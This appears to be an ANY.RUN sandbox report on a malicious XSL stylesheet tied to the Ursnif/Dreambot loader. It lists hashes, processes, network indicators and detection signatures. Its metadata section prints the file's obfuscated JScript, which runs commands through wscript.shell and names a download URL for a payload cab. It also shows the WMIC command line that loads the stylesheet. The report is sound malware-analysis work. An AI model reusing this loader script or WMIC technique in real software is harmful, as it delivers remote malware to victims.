analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

aNwxc.xsl

Full analysis: https://app.any.run/tasks/13c04949-7f42-4ac2-b71b-9bd3f8a74199
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: December 02, 2019, 17:08:39
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
trojan
gozi
ursnif
dreambot
Indicators:
MIME: text/xml
File info: XML 1.0 document text (XSL stylesheet)
MD5:

72FF94D038994E6701ABBD88920EB227

SHA1:

C73FE33A3C3D1C5E3EE9D094C2C510A144638203

SHA256:

2DBC83732EA05CCB0279642548CD835D46C32552E910F1DF46DF56FF9E27B35D

SSDEEP:

48:Ba51YxIKbMOlF+TfJNEmgIlcR9Q763VQrnzjlu63WrQWZ2+L6u09NOz679KdMVJ7:Bs1mFsfJNEfwsW/U63Wrzg+MNOz49Ha2

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Application was dropped or rewritten from another process

      • az3I5.exe (PID: 3800)

    • Downloads executable files from the Internet

      • WMIC.exe (PID: 2716)

    • Connects to CnC server

      • iexplore.exe (PID: 2192)

    • URSNIF was detected

      • iexplore.exe (PID: 2192)

  • SUSPICIOUS

    • Creates files in the Windows directory

      • WMIC.exe (PID: 2716)

    • Executable content was dropped or overwritten

      • WMIC.exe (PID: 2716)

    • Executed via COM

      • iexplore.exe (PID: 2040)

  • INFO

    • Reads Internet Cache Settings

      • iexplore.exe (PID: 2192)

    • Changes internet zones settings

      • iexplore.exe (PID: 2040)

    • Reads internet explorer settings

      • iexplore.exe (PID: 2192)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xml | Generic XML (ASCII) (100)

EXIF

XMP

StylesheetTemplateValue-ofSelect: user:aKYhU0('az3I5.exe')
StylesheetTemplateMatch: /
StylesheetScript: var ahaGR = false; var a2Xo7 = "aaSGcO"; ajkdIQ = a2Xo7.toString(); asK6l = 26298; var aqTAN = "http://bolanenkee.com/edgron/siloft.php?l=utowen2.cab"; var aZUX9 = "azGhu"; var aZ4D9 = aZUX9.toUpperCase(); var aqSlD = "aHasm"; var a1XS0O = aqSlD.toString(); var abOQp8 = -33177; var aPISi = "c:\\windows"; var a63hxs = false; auP3Ir = 42282; aSQCkA = "aLP4e5"; var a0T56 = aSQCkA.toString(); aL2JI6 = "awRAN"; atj9d = aL2JI6.toLowerCase(); a256B = "aKxeE"; aLAn2 = a256B.toLowerCase(); aaOX2 = "aEQUiV"; aqXgf = aaOX2.toString(); function aDEc1(aF83G) { var axnzO9 = "apQWu4"; var aK4puA = axnzO9.length; aqUG80 = "aoQnAc"; aEYt70 = aqUG80.toString(); var aKgBEe = 65175; var axzvt9 = new ActiveXObject("wscript.shell"); var aue2l = "aijuqB"; var a6LnyA = -10043; ahOlV = true; axzvt9.run(aF83G); }
StylesheetScriptImplements-prefix: user
StylesheetScriptLanguage: JScript
StylesheetVersion: 1
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
41
Monitored processes
4
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
drop and start start wmic.exe az3i5.exe no specs iexplore.exe #URSNIF iexplore.exe

Process information

PID
CMD
Path
Indicators
Parent process
2716"C:\Windows\System32\wbem\WMIC.exe" process list /format:"C:\Users\admin\Desktop\aNwxc.xsl"C:\Windows\System32\wbem\WMIC.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
WMI Commandline Utility
Exit code:
2147500037
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3800"C:\windows\temp\az3I5.exe" C:\windows\temp\az3I5.exeWMIC.exe
User:
admin
Company:
Numerix Felt Top Corporation
Integrity Level:
MEDIUM
Description:
Numerix Felt Top SinceShort
Version:
9.4.62.89 built by: 51899
2040"C:\Program Files\Internet Explorer\iexplore.exe" -EmbeddingC:\Program Files\Internet Explorer\iexplore.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
1
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2192"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2040 CREDAT:71937C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
Total events
445
Read events
390
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
0
Text files
14
Unknown types
3

Dropped files

PID
Process
Filename
Type
2040iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\favicon[1].ico
MD5:
SHA256:
2040iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
MD5:
SHA256:
2040iexplore.exeC:\Users\admin\AppData\Local\Temp\~DF6CCDA2584C6DF35F.TMP
MD5:
SHA256:
2040iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\{82069E1A-1526-11EA-AB41-5254004A04AF}.dat
MD5:
SHA256:
2040iexplore.exeC:\Users\admin\AppData\Local\Temp\~DFFCF27EDDAAF8AB7D.TMP
MD5:
SHA256:
2040iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{82069E19-1526-11EA-AB41-5254004A04AF}.dat
MD5:
SHA256:
2192iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.datdat
MD5:C4B08A00405DE09C4D03856A0E78E7EB
SHA256:B8DEBA80A0913BA572B020E5738E09795EC9AA909CA46293D55697EF4E8B2B3F
2716WMIC.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\utowen2[1].cabexecutable
MD5:B979AD3B1EA7475B8FC7F744AD906733
SHA256:628E195F27D15EE7C4FCA715205032BB51F8C1F1392CD501D8E5F0DDD7808EC7
2716WMIC.exeC:\windows\temp\az3I5.exeexecutable
MD5:B979AD3B1EA7475B8FC7F744AD906733
SHA256:628E195F27D15EE7C4FCA715205032BB51F8C1F1392CD501D8E5F0DDD7808EC7
2192iexplore.exeC:\Users\admin\AppData\Local\Temp\Low\JavaDeployReg.logtext
MD5:B37D2A4EF31AFE55AA04EA3A85488760
SHA256:F3ED01E9836D5E4DD3BC837A105CA205C2564A1306B49FE70FA9837AB1685DD0
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
3
DNS requests
3
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2716
WMIC.exe
GET
200
80.85.157.228:80
http://bolanenkee.com/edgron/siloft.php?l=utowen2.cab
RU
executable
232 Kb
suspicious
2192
iexplore.exe
GET
404
40.74.35.71:80
http://settings-win.data.microsoft.com/images/7IFpGVfZGXCUp7NvwyzP2/g1_2B0Ej21Ig_2BA/AV5hAUnmnO8SUvs/nxB0RuOZnNa0mrSrp3/zzUSZVDvw/4mNI0tGdnTvaCAhMLm_2/BDJGaqwR2CkUW9ujO0O/D18tcbyvbicDJzf2G_2B7S/0yEJ69FzJqB74/UF7k0.avi
NL
whitelisted
2040
iexplore.exe
GET
200
204.79.197.200:80
http://www.bing.com/favicon.ico
US
image
237 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2716
WMIC.exe
80.85.157.228:80
bolanenkee.com
Chelyabinsk-Signal LLC
RU
suspicious
2040
iexplore.exe
204.79.197.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
2192
iexplore.exe
40.74.35.71:80
settings-win.data.microsoft.com
Microsoft Corporation
NL
malicious

DNS requests

Domain
IP
Reputation
bolanenkee.com
  • 80.85.157.228
suspicious
www.bing.com
  • 204.79.197.200
  • 13.107.21.200
whitelisted
settings-win.data.microsoft.com
  • 40.74.35.71
whitelisted

Threats

PID
Process
Class
Message
2716
WMIC.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2716
WMIC.exe
A Network Trojan was detected
ET CURRENT_EVENTS Likely Evil EXE download from MSXMLHTTP non-exe extension M2
2716
WMIC.exe
Misc activity
ET INFO EXE - Served Attached HTTP
2192
iexplore.exe
A Network Trojan was detected
MALWARE [PTsecurity] W32.Dreambot HTTP GET Check-in
2 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
aNwxc.xsl